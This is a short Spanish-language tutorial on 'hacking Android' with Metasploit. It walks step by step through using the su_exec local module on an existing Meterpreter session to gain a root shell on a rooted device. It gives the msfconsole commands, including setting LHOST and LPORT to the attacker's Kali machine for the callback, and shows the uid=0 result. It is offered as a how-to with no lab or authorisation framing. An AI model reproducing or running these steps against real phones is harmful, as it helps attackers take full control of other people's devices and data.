Como hackear android con metasploit escalando privilegios a administrador
Como hackear android con metasploit escalando privilegios a administrador
Aquí tienes los pasos para usar el módulo exploit/android/local/su_exec
en Metasploit.
Requisitos
Antes de empezar, necesitas:
Una sesión de Meterpreter activa en un dispositivo Android.
Un dispositivo Android que ya esté rooteado (es decir, que tenga el binario
su
instalado).
Este módulo no es un exploit en el sentido tradicional. No busca una vulnerabilidad. Simplemente se aprovecha de la presencia del comando su
para obtener una nueva sesión con privilegios de root.
Pasos
Vuelve a la consola de Metasploit:
Si estás dentro de una sesión de Meterpreter, usa el comando background para volver a la línea de comandos principal de Metasploit.
Carga el módulo:
Usa el comando use para seleccionar el módulo su_exec.
Bashmsf6 > use exploit/android/local/su_exec
Configura las opciones:
El módulo tiene varias opciones que debes configurar. Para verlas, usa el comando show options.
Bashmsf6 exploit(android/local/su_exec) > show options
Las opciones más importantes son:
SESSION
: El número de la sesión de Meterpreter que quieres usar para ejecutar el módulo. Puedes ver las sesiones activas con el comandosessions -i
.LHOST
yLPORT
: Si el exploit crea una nueva sesión de Meterpreter, necesitarás configurar la dirección IP y el puerto de tu máquina Kali Linux.
Establece el número de sesión y el
LHOST
yLPORT
si es necesario.Bashmsf6 exploit(android/local/su_exec) > set SESSION 1 msf6 exploit(android/local/su_exec) > set LHOST 192.168.1.100 # Tu IP de Kali msf6 exploit(android/local/su_exec) > set LPORT 4444 # El puerto
Ejecuta el módulo:
Una vez que las opciones están configuradas, ejecuta el exploit con el comando run o exploit.
Bashmsf6 exploit(android/local/su_exec) > run
¿Qué ocurre después?
Si el módulo tiene éxito, verás un mensaje que indica que se ha abierto una nueva sesión de Meterpreter. Puedes verificar si la sesión tiene privilegios de root con el comando getuid
.
meterpreter > getuid
Server UID: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
Si el uid
es 0
, significa que has obtenido privilegios de root.
Si el comando falla o no se abre una nueva sesión, es posible que el dispositivo no esté rooteado o que el binario su
no esté configurado correctamente. Recuerda que este módulo solo funciona en dispositivos que ya han sido rooteados.